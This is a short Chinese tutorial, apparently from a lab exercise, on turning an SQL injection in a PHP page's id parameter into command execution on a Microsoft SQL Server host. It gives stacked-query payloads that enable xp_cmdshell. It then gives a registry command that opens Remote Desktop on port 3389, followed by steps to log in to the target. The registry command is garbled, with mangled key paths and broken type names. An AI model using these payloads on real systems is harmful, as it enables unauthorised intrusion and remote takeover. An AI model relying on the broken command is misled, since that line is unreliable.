我们用到的函数是
xp_cmdshell
利用此存储过程可以直接执行系统命令。
一、确立连接
输入IP+/1.php?id=1
出现如下界面说明连接成功
二、使用master
表开启xp_cmdshell服务
输入下列语句开启服务:
?id=1;
use master;
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
关闭服务:
?id=1;
use master;
-- EXEC sp_configure 'show advanced options', 0; //关完xp把这个注释解开,再执行
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0; //先关闭这里把1改成0,执行
RECONFIGURE;
开启3389端口,连接远程桌面
id=1;
use master;
Exec master..xp_cmdshell "REG ADD HKLMISYSTEMCurrentControlSetlControNTerminal" "Server Iv fDenyTSConnections /t REG_ DWORD /d 0 /f"
在虚拟机终端输入netstat -ano
查看端口,看到3389执行成功
键盘Win+R打开命令行窗口、输入mstsc
打开远程桌面
输入目标IP连接
点击更多选项
使用其他账户
输入目标机的登录用户名
和密码即可
成功。